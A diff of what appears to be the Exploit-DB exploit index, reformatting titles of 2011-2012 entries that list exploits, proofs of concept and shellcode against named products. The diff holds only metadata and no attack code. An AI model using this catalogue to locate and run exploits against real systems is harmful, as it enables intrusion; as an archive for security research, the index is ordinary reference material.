Overflow",2011-10-26,metasploit,windows,local,0 +18038,platforms/windows/local/18038.rb,"GTA SA-MP server.cfg - Buffer Overflow",2011-10-26,metasploit,windows,local,0 18039,platforms/php/webapps/18039.txt,"WordPress wptouch plugin SQL Injection Vulnerability",2011-10-27,longrifle0x,php,webapps,0 18040,platforms/linux/local/18040.c,"Xorg 1.4 to 1.11.2 File Permission Change PoC",2011-10-28,vladz,linux,local,0 18042,platforms/php/webapps/18042.txt,"Techfolio 1.0 Joomla Component SQL Injection Vulnerability",2011-10-28,"Chris Russell",php,webapps,0 -18043,platforms/windows/dos/18043.py,"GFI Faxmaker - Fax Viewer v10.0[build 237] DoS (Poc).",2011-10-28,loneferret,windows,dos,0 -18045,platforms/php/webapps/18045.txt,"PHP Photo Album <= (0.4.1.16) Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0 +18043,platforms/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 [build 237] - DoS (Poc).",2011-10-28,loneferret,windows,dos,0 +18045,platforms/php/webapps/18045.txt,"PHP Photo Album <= 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0 18046,platforms/php/webapps/18046.txt,"Barter Sites 1.3 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18047,platforms/php/webapps/18047.txt,"JEEMA SMS 3.2 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18048,platforms/php/webapps/18048.txt,"Vik Real Estate 1.0 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 @@ -15660,7 +15660,7 @@ id,file,description,date,author,platform,type,port 18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC",2011-10-31,rgod,windows,dos,0 18053,platforms/php/webapps/18053.txt,"WordPress Classipress Theme <= 3.1.4 Stored XSS",2011-10-31,"Paul Loftness",php,webapps,0 18055,platforms/php/webapps/18055.txt,"WordPress WP Glossary Plugin SQL Injection",2011-10-31,longrifle0x,php,webapps,0 -18056,platforms/php/webapps/18056.txt,"jbShop - e107 v7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0 +18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0 18057,platforms/windows/remote/18057.rb,"NJStar Communicator 3.00 MiniSMTP Server Remote Exploit",2011-10-31,"Dillon Beresford ",windows,remote,0 18058,platforms/php/webapps/18058.txt,"Joomla Component Alameda (com_alameda) SQL Injection",2011-10-31,kaMtiEz,php,webapps,0 18061,platforms/hardware/webapps/18061.txt,"ZTE ZXDSL 831IIV7.5.0a_Z29_OV Multiple Vulnerabilities",2011-11-01,"mehdi boukazoula",hardware,webapps,0 @@ -15671,11 +15671,11 @@ id,file,description,date,author,platform,type,port 18066,platforms/php/webapps/18066.txt,"CaupoShop Pro (2.x/ <= 3.70) Classic 3.01 Local File Include Vulnerability",2011-11-02,"Rami Salama",php,webapps,0 18067,platforms/windows/local/18067.txt,"Microsoft Excel 2007 SP2 Buffer Overwrite Exploit",2011-11-02,Abysssec,windows,local,0 18068,platforms/hardware/remote/18068.rb,"LifeSize Room Command Injection",2011-11-02,metasploit,hardware,remote,0 -18069,platforms/php/webapps/18069.txt,"Jara v1.6 Multiple Vulnerabilities",2011-11-03,Or4nG.M4N,php,webapps,0 +18069,platforms/php/webapps/18069.txt,"Jara 1.6 - Multiple Vulnerabilities",2011-11-03,Or4nG.M4N,php,webapps,0 18070,platforms/php/webapps/18070.txt,"Web File Browser 0.4b14 File Download Vulnerability",2011-11-03,"Sangyun YOO",php,webapps,0 18071,platforms/linux/local/18071.sh,"Calibre E-Book Reader Local Root Exploit",2011-11-03,zx2c4,linux,local,0 18072,platforms/linux/local/18072.sh,"Calibre E-Book Reader Local Root Race Condition Exploit",2011-11-03,zx2c4,linux,local,0 -18075,platforms/php/webapps/18075.txt,"Ajax File and Image Manager v1.0 Final Remote Code Execution Vulnerability",2011-11-04,EgiX,php,webapps,0 +18075,platforms/php/webapps/18075.txt,"Ajax File and Image Manager 1.0 Final - Remote Code Execution Vulnerability",2011-11-04,EgiX,php,webapps,0 18076,platforms/php/webapps/18076.txt,"Advanced Poll 2.02 SQL Injection Vulnerability",2011-11-04,"Yassin Aboukir",php,webapps,0 18077,platforms/windows/webapps/18077.txt,"HP Data Protector Media Operations <= 6.20 Directory Traversal",2011-11-04,"Luigi Auriemma",windows,webapps,0 18078,platforms/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 Use After Free",2011-11-04,"Luigi Auriemma",windows,dos,0 @@ -15685,7 +15685,7 @@ id,file,description,date,author,platform,type,port 18082,platforms/windows/local/18082.rb,"Mini-Stream 3.0.1.1 Buffer Overflow Exploit",2011-11-04,metasploit,windows,local,0 18083,platforms/php/webapps/18083.php,"Zenphoto <= 1.4.1.4 (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18084,platforms/php/webapps/18084.php,"phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 -18085,platforms/php/webapps/18085.php,"aidiCMS v3.55 (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 +18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18086,platforms/linux/local/18086.c,"Calibre E-Book Reader Local Root",2011-11-05,zx2c4,linux,local,0 18087,platforms/windows/local/18087.rb,"MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow",2011-11-05,metasploit,windows,local,0 18088,platforms/php/webapps/18088.txt,"WHMCompleteSolution 3.x/4.x Multiple Vulnerabilities",2011-11-07,ZxH-Labs,php,webapps,0 @@ -15694,7 +15694,7 @@ id,file,description,date,author,platform,type,port 18091,platforms/php/webapps/18091.txt,"OrderSys <= 1.6.4 SQL Injection",2011-11-07,muuratsalo,php,webapps,0 18092,platforms/windows/remote/18092.html,"Oracle Hyperion Strategic Finance 12.x Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow",2011-11-07,rgod,windows,remote,0 18093,platforms/windows/remote/18093.txt,"Oracle XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA Procedure Exploit",2011-11-07,"David Maman",windows,remote,0 -18095,platforms/php/webapps/18095.txt,"11in1 CMS v1.0.1 (do.php) CRLF Injection Vulnerability",2011-11-08,LiquidWorm,php,webapps,0 +18095,platforms/php/webapps/18095.txt,"11in1 CMS 1.0.1 (do.php) - CRLF Injection Vulnerability",2011-11-08,LiquidWorm,php,webapps,0 18096,platforms/windows/local/18096.py,"Aviosoft Digital TV Player Professional 1.x Stack Buffer Overflow",2011-11-09,modpr0be,windows,local,0 18099,platforms/php/webapps/18099.txt,"osCSS2 ""_ID"" parameter Local file inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0 18100,platforms/php/webapps/18100.txt,"LabWiki <= 1.1 Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0 @@ -15702,18 +15702,18 @@ id,file,description,date,author,platform,type,port 18102,platforms/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)",2011-11-09,Node,windows,remote,0 18105,platforms/linux/local/18105.sh,"glibc LD_AUDIT arbitrary DSO load Privilege Escalation",2011-11-10,zx2c4,linux,local,0 18106,platforms/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 PDF/WWF File Handling DoS",2011-11-11,LiquidWorm,windows,dos,0 -18107,platforms/windows/dos/18107.py,"Kool Media Converter v2.6.0 DOS",2011-11-11,swami,windows,dos,0 +18107,platforms/windows/dos/18107.py,"Kool Media Converter 2.6.0 - DOS",2011-11-11,swami,windows,dos,0 18108,platforms/php/webapps/18108.rb,"Support Incident Tracker <= 3.65 Remote Command Execution",2011-11-13,metasploit,php,webapps,0 18109,platforms/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",2011-11-13,metasploit,windows,local,0 18110,platforms/php/webapps/18110.txt,"CMS 4.x.x Zorder (SQL Injection Vul)",2011-11-13,"KraL BeNiM",php,webapps,0 18111,platforms/php/webapps/18111.php,"Wordpress Zingiri Plugin <= 2.2.3 (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 18112,platforms/windows/dos/18112.txt,"Optima APIFTP Server <= 1.5.2.13 Multiple Vulnerabilities",2011-11-14,"Luigi Auriemma",windows,dos,0 -18113,platforms/windows/local/18113.rb,"Mini-Stream RM-MP3 Converter v3.1.2.1 (PLS File) Stack Buffer Overflow",2011-11-14,metasploit,windows,local,0 +18113,platforms/windows/local/18113.rb,"Mini-Stream RM-MP3 Converter 3.1.2.1 - (.pls) Stack Buffer Overflow",2011-11-14,metasploit,windows,local,0 18114,platforms/php/webapps/18114.txt,"WordPress AdRotate plugin <= 3.6.6 SQL Injection",2011-11-14,"Miroslav Stampar",php,webapps,0 18115,platforms/php/webapps/18115.txt,"Pixie CMS 1.01 - 1.04 Blind SQL Injections",2011-11-14,Piranha,php,webapps,0 18116,platforms/multiple/dos/18116.html,"Firefox 8.0 Null Pointer Dereference PoC",2011-11-14,0in,multiple,dos,0 18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 (latest) - Time-based SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0 -18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability",2011-11-15,PCA,php,webapps,0 +18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq File Upload Vulnerability",2011-11-15,PCA,php,webapps,0 18119,platforms/windows/dos/18119.rb,"Attachmate Reflection FTP Client Heap Overflow",2011-11-16,"Francis Provencher",windows,dos,0 18120,platforms/linux/dos/18120.py,"FleaHttpd Remote Denial Of Service Exploit",2011-11-16,condis,linux,dos,80 18121,platforms/php/webapps/18121.txt,"FreeWebshop <= 2.2.9 R2 (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0 @@ -15748,12 +15748,12 @@ id,file,description,date,author,platform,type,port 18164,platforms/hardware/webapps/18164.php,"Android 'content://' URI Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",hardware,webapps,0 18165,platforms/windows/dos/18165.txt,"Siemens Automation License Manager <= 500.0.122.1 Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 -18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin 0-day",2011-11-28,Alberto_García_Illera,php,webapps,0 +18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin 0day",2011-11-28,Alberto_García_Illera,php,webapps,0 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine Remote Code Execution",2011-11-30,metasploit,multiple,remote,0 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 and 4300 Command Execution",2011-11-30,metasploit,hardware,remote,0 18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 Malformed .bed file Buffer Overflow Vulnerability",2011-11-30,Silent_Dream,windows,dos,0 18174,platforms/windows/local/18174.py,"GOM Player 2.1.33.5071 ASX File Unicode Stack Buffer Overflow Exploit",2011-11-30,"Debasish Mandal",windows,local,0 -18176,platforms/windows/local/18176.py,"MS11-080 Afd.sys Privilege Escalation Exploit",2011-11-30,"Matteo Memelli",windows,local,0 +18176,platforms/windows/local/18176.py,"MS11-080 Afd.sys Privilege Escalation Exploit",2011-11-30,ryujin,windows,local,0 18177,platforms/php/webapps/18177.txt,"WikkaWiki <= 1.3.2 Multiple Security Vulnerabilities",2011-11-30,EgiX,php,webapps,0 18178,platforms/windows/local/18178.rb,"CCMPlayer 1.5 Stack based Buffer Overflow SEH Exploit (.m3u)",2011-11-30,Rh0,windows,local,0 18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller Authentication Bypass Vulnerability",2011-11-30,"Alexey Sintsov",jsp,remote,0 @@ -15763,21 +15763,21 @@ id,file,description,date,author,platform,type,port 18184,platforms/windows/local/18184.rb,"Final Draft 8 Multiple Stack Buffer Overflows",2011-12-01,"Nick Freeman",windows,local,0 18185,platforms/php/webapps/18185.txt,"Muster Render Farm Management System Arbitrary File Download",2011-12-01,"Nick Freeman",php,webapps,0 18186,platforms/windows/local/18186.rb,"StoryBoard Quick 6 Stack Buffer Overflow",2011-12-01,"Nick Freeman",windows,local,0 -18187,platforms/windows/remote/18187.c,"CoDeSys SCADA v2.3 Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0 +18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0 18188,platforms/windows/dos/18188.txt,"Hillstone Software HS TFTP Server Denial Of Service Vulnerability",2011-12-02,"SecPod Research",windows,dos,0 18189,platforms/windows/remote/18189.txt,"Ipswitch TFTP Server Directory Traversal Vulnerability",2011-12-02,"SecPod Research",windows,remote,0 -18190,platforms/windows/remote/18190.rb,"Serv-U FTP Server <4.2 Buffer Overflow",2011-12-02,metasploit,windows,remote,0 +18190,platforms/windows/remote/18190.rb,"Serv-U FTP Server < 4.2 - Buffer Overflow",2011-12-02,metasploit,windows,remote,0 18192,platforms/php/webapps/18192.txt,"Joomla Jobprofile Component (com_jobprofile) SQL Injection",2011-12-02,kaMtiEz,php,webapps,0 18193,platforms/php/webapps/18193.txt,"WSN Classifieds 6.2.12 and 6.2.18 - Multiple Vulnerabilities",2011-12-02,d3v1l,php,webapps,0 18195,platforms/windows/local/18195.rb,"CCMPlayer 1.5 Stack based Buffer Overflow (.m3u)",2011-12-03,metasploit,windows,local,0 18196,platforms/windows/dos/18196.py,"NJStar Communicator MiniSmtp Buffer Overflow [ASLR Bypass]",2011-12-03,Zune,windows,dos,0 18197,platforms/lin_x86-64/shellcode/18197.c,"linux/x86-64 execve(/bin/sh) 52 bytes",2011-12-03,X-h4ck,lin_x86-64,shellcode,0 -18198,platforms/php/webapps/18198.php,"Family Connections CMS v2.5.0-v2.7.1 (less.php) Remote Command Execution",2011-12-04,mr_me,php,webapps,0 +18198,platforms/php/webapps/18198.php,"Family Connections CMS 2.5.0 & 2.7.1 - (less.php) Remote Command Execution",2011-12-04,mr_me,php,webapps,0 18199,platforms/hardware/dos/18199.pl,"ShareCenter D-Link DNS-320 Remote reboot/shutdown/reset (DoS)",2011-12-05,rigan,hardware,dos,0 18200,platforms/windows/dos/18200.txt,"SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC",2011-12-05,LiquidWorm,windows,dos,0 18201,platforms/windows/local/18201.txt,"SopCast 3.4.7 (Diagnose.exe) Improper Permissions",2011-12-05,LiquidWorm,windows,local,0 18202,platforms/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' SQL-Injection vulnerability",2011-12-05,"Stefan Schurtz",php,webapps,0 -18207,platforms/php/webapps/18207.txt,"AlstraSoft EPay Enterprise v4.0 Blind SQL Injection",2011-12-06,Don,php,webapps,0 +18207,platforms/php/webapps/18207.txt,"AlstraSoft EPay Enterprise 4.0 - Blind SQL Injection",2011-12-06,Don,php,webapps,0 18208,platforms/php/webapps/18208.rb,"Family Connections less.php Remote Command Execution",2011-12-07,metasploit,php,webapps,0 18210,platforms/php/webapps/18210.txt,"Php City Portal Script Software SQL Injection",2011-12-07,Don,php,webapps,0 18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin SQL Injection",2011-12-07,CrazyMouse,php,webapps,0 @@ -15790,19 +15790,19 @@ id,file,description,date,author,platform,type,port 18221,platforms/linux/dos/18221.c,"Apache HTTP Server Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0 18222,platforms/php/webapps/18222.txt,"SePortal 2.5 SQL Injection",2011-12-09,Don,php,webapps,0 18223,platforms/windows/dos/18223.pl,"Free Opener Local Denial of Service",2011-12-09,"Iolo Morganwg",windows,dos,0 -18224,platforms/php/webapps/18224.php,"Docebo LMS <= v4.0.4 (messages) Remote Code Execution",2011-12-09,mr_me,php,webapps,0 +18224,platforms/php/webapps/18224.php,"Docebo LMS <= 4.0.4 - (messages) Remote Code Execution",2011-12-09,mr_me,php,webapps,0 18225,platforms/linux/dos/18225.c,"CSF Firewall Buffer Overflow",2011-12-09,"FoX HaCkEr",linux,dos,0 18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.",2011-12-10,rigan,linux_mips,shellcode,0 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() - 32 bytes.",2011-12-10,rigan,linux_mips,shellcode,0 18228,platforms/linux/local/18228.sh,"Acpid 1:2.0.10-1ubuntu2 Privilege Boundary Crossing Vulnerability",2011-12-10,otr,linux,local,0 18230,platforms/php/webapps/18230.txt,"FCMS_2.7.2 cms and earlier multiple stored XSS Vulnerability",2011-12-10,"Ahmed Elhady Mohamed",php,webapps,0 -18231,platforms/php/webapps/18231.txt,"Wordpress UPM-POLLS Plugin 1.0.4 Blind SQL Injection",2011-12-11,Saif,php,webapps,0 +18231,platforms/php/webapps/18231.txt,"Wordpress UPM-POLLS Plugin 1.0.4 Blind SQL Injection",2011-12-11,Saif,php,webapps,0 18232,platforms/php/webapps/18232.txt,"FCMS_2.7.2 cms and earlier multiple CSRF Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps,0 18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0 18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0 -18236,platforms/php/webapps/18236.txt,"Pixie v1.04 blog post CSRF",2011-12-11,hackme,php,webapps,0 +18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post CSRF",2011-12-11,hackme,php,webapps,0 18239,platforms/php/webapps/18239.rb,"Traq <= 2.3 Authentication Bypass / Remote Code Execution Exploit",2011-12-13,metasploit,php,webapps,0 -18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA v2.3 Webserver Stack Buffer Overflow",2011-12-13,metasploit,windows,remote,0 +18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - Webserver Stack Buffer Overflow",2011-12-13,metasploit,windows,remote,0 18243,platforms/php/webapps/18243.rb,"PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit",2011-12-14,metasploit,php,webapps,0 18245,platforms/multiple/remote/18245.py,"Splunk Remote Root Exploit",2011-12-15,"Gary O'Leary-Steele",multiple,remote,0 18246,platforms/php/webapps/18246.txt,"Seotoaster SQL Injection Admin Login Bypass",2011-12-16,"Stefan Schurtz",php,webapps,0 @@ -15817,14 +15817,14 @@ id,file,description,date,author,platform,type,port 18258,platforms/windows/local/18258.c,"TORCS 1.3.1 acc Buffer Overflow",2011-12-20,"Andrés Gómez",windows,local,0 18259,platforms/php/webapps/18259.txt,"Infoproject Business Hero Multiple Vulnerabilities",2011-12-21,LiquidWorm,php,webapps,0 18260,platforms/jsp/webapps/18260.txt,"Barracuda Control Center 620 - Multiple Web Vulnerabilities",2011-12-21,Vulnerability-Lab,jsp,webapps,0 -18261,platforms/php/webapps/18261.txt,"SpamTitan v5.08 Multiple Vulnerabilities",2011-12-21,Vulnerability-Lab,php,webapps,0 +18261,platforms/php/webapps/18261.txt,"SpamTitan 5.08 - Multiple Vulnerabilities",2011-12-21,Vulnerability-Lab,php,webapps,0 18262,platforms/multiple/webapps/18262.txt,"Plone and Zope Remote Command Execution PoC",2011-12-21,"Nick Miles",multiple,webapps,0 18265,platforms/php/webapps/18265.txt,"Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php) Remote PHP Code Injection",2011-12-22,EgiX,php,webapps,0 18266,platforms/php/webapps/18266.py,"Open Conference/Journal/Harvester Systems <= 2.3.X Multiple RCE Vulnerabilities",2011-12-23,mr_me,php,webapps,0 18268,platforms/windows/dos/18268.txt,"FreeSSHd Crash PoC",2011-12-24,Level,windows,dos,0 18269,platforms/windows/dos/18269.py,"MySQL 5.5.8 Remote Denial Of Service (DOS)",2011-12-24,Level,windows,dos,0 18270,platforms/windows/dos/18270.py,"Putty 0.60 Crash PoC",2011-12-24,Level,windows,dos,0 -18271,platforms/windows/dos/18271.py,"Windows Media Player v11.0.5721.5262 Remote Denial Of Service (DOS)",2011-12-24,Level,windows,dos,0 +18271,platforms/windows/dos/18271.py,"Windows Media Player 11.0.5721.5262 - Remote Denial Of Service (DOS)",2011-12-24,Level,windows,dos,0 18272,platforms/windows/dos/18272.py,"Windows Explorer Denial Of Service (DOS)",2011-12-24,Level,windows,dos,0 18274,platforms/php/webapps/18274.txt,"OpenEMR 4 Multiple Vulnerabilities",2011-12-25,Level,php,webapps,0 18275,platforms/win64/dos/18275.txt,"GdiDrawStream BSoD using Safari",2011-12-18,webDEViL,win64,dos,0 @@ -15834,9 +15834,9 @@ id,file,description,date,author,platform,type,port 18280,platforms/linux/remote/18280.c,"Telnetd encrypt_keyid: Remote Root function pointer overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0 18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 Universal exploit metasploit",2011-12-27,"Fady Mohammed Osman",windows,remote,0 18285,platforms/windows/dos/18285.py,"VLC 1.1.11 (libav) libavcodec_plugin.dll DOS",2011-12-28,"Mitchell Adair",windows,dos,0 -18287,platforms/php/webapps/18287.php,"Simple File Upload v1.3 Joomla Module Remote Code Execution",2011-12-28,gmda,php,webapps,0 +18287,platforms/php/webapps/18287.php,"Joomla Module Simple File Upload 1.3 - Remote Code Execution",2011-12-28,gmda,php,webapps,0 18288,platforms/php/webapps/18288.txt,"DIY-CMS blog mod SQL Injection Vulnerability",2011-12-29,snup,php,webapps,0 -18290,platforms/php/webapps/18290.txt,"Winn Guestbook v2.4.8c Stored XSS Vulnerability",2011-12-29,G13,php,webapps,0 +18290,platforms/php/webapps/18290.txt,"Winn Guestbook 2.4.8c - Stored XSS Vulnerability",2011-12-29,G13,php,webapps,0 18291,platforms/hardware/remote/18291.txt,"Reaver WiFi Protected Setup Exploit",2011-12-30,cheffner,hardware,remote,0 18292,platforms/php/webapps/18292.txt,"Dede CMS All Versions SQL Injection Vulnerability",2011-12-30,"CWH and Nafsh",php,webapps,0 18293,platforms/php/webapps/18293.txt,"Akiva WebBoard 8.x SQL Injection Vulnerability",2011-12-30,"Alexander Fuchs",php,webapps,0 @@ -15847,22 +15847,22 @@ id,file,description,date,author,platform,type,port 18298,platforms/php/webapps/18298.txt,"Php-X-Links Script SQL Injection Vulnerabilitiy",2012-01-02,"H4ckCity Security Team",php,webapps,0 18300,platforms/php/webapps/18300.txt,"MyPHPDating 1.0 SQL Injection Vulnerability",2012-01-02,ITTIHACK,php,webapps,0 18305,platforms/php/dos/18305.py,"PHP Hash Table Collision Proof Of Concept",2012-01-03,"Christian Mehlmauer",php,dos,0 -18308,platforms/php/webapps/18308.txt,"Typo3 v4.5-4.7 Remote Code Execution (RFI/LFI)",2012-01-04,MaXe,php,webapps,0 -18309,platforms/windows/dos/18309.pl,"VLC Media Player v1.1.11 (.amr) Denial of Service PoC",2012-01-04,Fabi@habsec,windows,dos,0 +18308,platforms/php/webapps/18308.txt,"Typo3 4.5-4.7 - Remote Code Execution (RFI/LFI)",2012-01-04,MaXe,php,webapps,0 +18309,platforms/windows/dos/18309.pl,"VLC Media Player 1.1.11 - (.amr) Denial of Service PoC",2012-01-04,Fabi@habsec,windows,dos,0 18314,platforms/php/webapps/18314.txt,"Posse Softball Director CMS SQL Injection Vulnerabilitiy",2012-01-04,"H4ckCity Security Team",php,webapps,0 18318,platforms/windows/dos/18318.py,"Netcut 2.0 Denial of Service Vulnerability",2012-01-04,MaYaSeVeN,windows,dos,0 18320,platforms/php/webapps/18320.txt,"Posse Softball Director CMS (team.php) Blind SQL Injection Vulnerability",2012-01-04,"Easy Laster",php,webapps,0 18322,platforms/php/webapps/18322.txt,"TinyWebGallery 1.8.3 Remote Command Execution",2012-01-06,Expl0!Ts,php,webapps,0 18327,platforms/netware/dos/18327.txt,"Novell Netware XNFS.NLM NFS Rename Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 18328,platforms/netware/dos/18328.txt,"Novell Netware XNFS.NLM STAT Notify Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 -18329,platforms/multiple/webapps/18329.txt,"Apache Struts2 <= 2.3.1 Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0 +18329,platforms/multiple/webapps/18329.txt,"Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0 18330,platforms/php/webapps/18330.txt,"Wordpress Pay With Tweet Plugin <= 1.1 Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0 18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro 0day",2012-01-08,"b33f g11tch",windows,local,0 18335,platforms/php/webapps/18335.txt,"MangosWeb SQL Injection Vulnerability",2012-01-08,Hood3dRob1n,php,webapps,0 18336,platforms/hardware/dos/18336.pl,"AirTies-4450 Unauthorized Remote Reboot",2012-01-08,rigan,hardware,dos,0 18337,platforms/windows/dos/18337.pl,"M-Player 0.4 Local Denial of Service Vulnerability",2012-01-08,JaMbA,windows,dos,0 -18338,platforms/php/webapps/18338.txt,"phpMyDirectory.com v1.3.3 SQL Injection",2012-01-08,Serseri,php,webapps,0 -18339,platforms/windows/dos/18339.py,"GPSMapEdit v1.1.73.2 (.lst) Local Denial of Service Vulnerability",2012-01-09,"Julien Ahrens",windows,dos,0 +18338,platforms/php/webapps/18338.txt,"phpMyDirectory.com 1.3.3 - SQL Injection",2012-01-08,Serseri,php,webapps,0 +18339,platforms/windows/dos/18339.py,"GPSMapEdit 1.1.73.2 (.lst) - Local Denial of Service Vulnerability",2012-01-09,"Julien Ahrens",windows,dos,0 18340,platforms/php/webapps/18340.txt,"Paddelberg Topsite Script Authentication Bypass Vulnerability",2012-01-09,"Christian Inci",php,webapps,0 18341,platforms/php/webapps/18341.txt,"Clip Bucket 2.6 Multiple Vulnerabilities",2012-01-09,YaDoY666,php,webapps,0 18342,platforms/php/webapps/18342.txt,"SAPID 1.2.3 Stable Remote File Inclusion Vulnerability",2012-01-09,"Opa Yong",php,webapps,0 @@ -15878,7 +15878,7 @@ id,file,description,date,author,platform,type,port 18353,platforms/php/webapps/18353.txt,"WordPress wp-autoyoutube plugin Blind SQL Injection Vulnerability",2012-01-12,longrifle0x,php,webapps,0 18354,platforms/windows/remote/18354.py,"WorldMail imapd 3.0 SEH overflow (egg hunter)",2012-01-12,TheXero,windows,remote,0 18355,platforms/php/webapps/18355.txt,"Wordpress Count-per-day plugin Multiple Vulnerabilities",2012-01-12,6Scan,php,webapps,0 -18356,platforms/php/webapps/18356.txt,"Tine v2.0 Maischa Multiple Cross Site Scripting Vulnerabilities",2012-01-13,Vulnerability-Lab,php,webapps,0 +18356,platforms/php/webapps/18356.txt,"Tine 2.0 - Maischa Multiple Cross Site Scripting Vulnerabilities",2012-01-13,Vulnerability-Lab,php,webapps,0 18357,platforms/php/webapps/18357.txt,"Pragyan CMS 2.6.1 Arbitrary File Upload Vulnerability",2012-01-13,Dr.KroOoZ,php,webapps,0 18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability",2012-01-14,metasploit,windows,remote,0 18366,platforms/windows/local/18366.rb,"Adobe Reader U3D Memory Corruption Vulnerability",2012-01-14,metasploit,windows,local,0 @@ -15913,21 +15913,21 @@ id,file,description,date,author,platform,type,port 18397,platforms/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter <= 3.8.2 Remote Pre-Auth Command Execute",2012-01-20,Abysssec,windows,remote,0 18399,platforms/windows/dos/18399.py,"VLC 1.2.0 (libtaglib_pluggin.dll) DoS",2012-01-20,"Mitchell Adair",windows,dos,0 18401,platforms/windows/remote/18401.py,"Savant Web Server 3.1 Buffer Overflow Exploit (Egghunter)",2012-01-21,red-dragon,windows,remote,0 -18402,platforms/php/webapps/18402.pl,"php ireport v1.0 Remote Html Code injection",2012-01-21,Or4nG.M4N,php,webapps,0 +18402,platforms/php/webapps/18402.pl,"PHP iReport 1.0 - Remote Html Code injection",2012-01-21,Or4nG.M4N,php,webapps,0 18403,platforms/php/webapps/18403.txt,"Nova CMS Directory Traversal",2012-01-21,"Red Security TEAM",php,webapps,0 -18404,platforms/php/webapps/18404.pl,"iSupport v1.x CSRF HTML Code Injection to Add Admin",2012-01-21,Or4nG.M4N,php,webapps,0 +18404,platforms/php/webapps/18404.pl,"iSupport 1.x - CSRF HTML Code Injection to Add Admin",2012-01-21,Or4nG.M4N,php,webapps,0 18405,platforms/asp/webapps/18405.txt,"ARYADAD Multiple Vulnerabilities",2012-01-21,"Red Security TEAM",asp,webapps,0 18407,platforms/php/webapps/18407.txt,"AllWebMenus < 1.1.9 WordPress Menu Plugin Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0 -18410,platforms/php/webapps/18410.txt,"miniCMS v1.0 : v2.0 php inject code",2012-01-22,Or4nG.M4N,php,webapps,0 